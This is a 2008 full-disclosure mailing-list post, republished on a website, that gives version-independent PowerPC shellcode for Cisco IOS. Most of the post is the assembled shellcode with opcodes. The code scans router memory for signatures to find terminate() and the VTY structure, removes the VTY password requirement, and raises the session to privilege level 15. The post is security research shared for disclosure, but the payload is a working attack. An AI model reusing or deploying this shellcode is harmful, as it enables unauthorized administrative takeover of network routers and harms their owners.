Version-independent IOS shellcode

From: Andy Davis <iosftpexploit@googlemail.com>
To: full-disclosure@lists.grok.org.uk,vuln-dev@securityfocus.com
Cc:
Subject: Version-independent IOS shellcode
Date:


Hi,

One of the biggest problems with IOS exploitation is that on every
different version of IOS, the addresses required to execute useful
shellcode are different. Therefore, hard-coded addresses were inserted
into shellcode and this made exploits very version-dependent.

I have been working on a way around this and here is the first
iteration of just one of the solutions to the problem. It uses a
search routine to locate 4-byte signatures that occur near references
to the required addresses within the IOS image located in the "text"
memory region. The addresses are then recovered from memory and used
within the shellcode.

Cheers,

Andy



# Version-independent IOS shellcode, Andy Davis 2008
#
# No hard-coded IOS addresses required
#
# The technique uses 4-byte signatures near references to the
# required addresses within the IOS "text" memory region.
# The addresses are then recovered from memory and used within the
# shellcode.
#
# This is beta 1 - this code can be highly optimised I'm sure,
# for example, the search routine could be reused and the number
# of registers cleared could be reduced - but it works :-)
#
# As this is the first iteration of this shellcode, I'm not making any
# claims as to exactly how portable it is - it has been tested on a
# number of IOS images and therefore, the concept has been demonstrated.
#
# Various simple techniques have been used to ensure that there are
# no nulls in the shellcode


.equ    sig_vty, 0x7F60B910     # signature for vty_info
.equ    sig_kill, 0x639C8889    # signature for terminate()
.equ    start, 0x80018001       # start of the search


3c 80 80 02     lis     r4,-32766
38 84 80 01     addi    r4,r4,-32767   # the start address for the search
3c a0 63 9d     lis     r5,25501
38 a5 88 89     addi    r5,r5,-30583        # the "sig_kill" search signature
38 e7 01 94     addi    r7,r7,404       # add 4 without introducing nulls
(technique used throughout the shellcode)
38 e7 fe 70     addi    r7,r7,-400
7c c4 38 6e l1: lwzux   r6,r4,r7
7c 06 28 40     cmplw   r6,r5           # is address contents equal to signature
40 82 ff f8     bne     18 <l1>          # no, keep searching
7c a5 2a 78     xor     r5,r5,r5       # yes, found "sig_kill"
38 84 01 e8     addi    r4,r4,488 
38 84 fe 70     addi    r4,r4,-400
7c c4 28 2e     lwzx    r6,r4,r5
38 a5 01 98     addi    r5,r5,408      
38 a5 fe 70     addi    r5,r5,-400
7c c6 28 30     slw     r6,r6,r5
7c c6 2c 30     srw     r6,r6,r5
38 c6 ff ff     addi    r6,r6,-1  # r6 now contains the offset of
terminate() from here
7c 84 32 14     add     r4,r4,r6  # add offset to current address
7c 8a 23 78     mr      r10,r4              # address of terminate() saved into r10
7c e7 3a 78     xor     r7,r7,r7
3c a0 7f 61     lis     r5,32609
38 a5 b9 10     addi    r5,r5,-18160      # the "sig_vty" search signature
38 e7 01 94     addi    r7,r7,404
38 e7 fe 70     addi    r7,r7,-400
7c c4 38 6e l2: lwzux   r6,r4,r7
7c 06 28 40     cmplw   r6,r5          # is address contents equal to signature
40 82 ff f8     bne     64 <l2>          # no, keep searching
38 84 01 a8     addi    r4,r4,424      # yes, found "sig_vty"
38 84 fe 70     addi    r4,r4,-400
7c e7 3a 78     xor     r7,r7,r7
7c a4 38 2e     lwzx    r5,r4,r7       # get two MSBs
38 a5 ff ff     addi    r5,r5,-1
7d 08 42 78     xor     r8,r8,r8
39 08 01 a0     addi    r8,r8,416
39 08 fe 70     addi    r8,r8,-400
7c a5 40 30     slw     r5,r5,r8      # shift MSBs into the right place (XXXX0000)
38 84 01 94     addi    r4,r4,404
38 84 fe 70     addi    r4,r4,-400
7c c4 38 2e     lwzx    r6,r4,r7  # get two LSBs
7c c6 40 30     slw     r6,r6,r8     
7c c6 44 30     srw     r6,r6,r8   # shift LSBs to clear the MSBs (0000YYYY)
7c a5 32 14     add     r5,r5,r6  # add the two together (XXXXYYYY)
38 a5 01 08     addi    r5,r5,264 # move to the 66th element of the
array (VTY 0 - see IOS "systat" command)
7d 05 38 2e     lwzx    r8,r5,r7   # r8 = vty_info
90 e8 01 74     stw     r7,372(r8)  # Remove the requirement to enter a password
38 e7 ff ff     addi    r7,r7,-1
39 08 09 1a     addi    r8,r8,2330
90 e8 04 ca     stw     r7,1226(r8)        # privilege escalate to level 15
7c e3 3b 78     mr      r3,r7
7d 49 03 a6     mtctr   r10
4e 80 04 20     bctr                     # terminate "this process"





Copyright © 1995-2021 LinuxRocket.net. All rights reserved.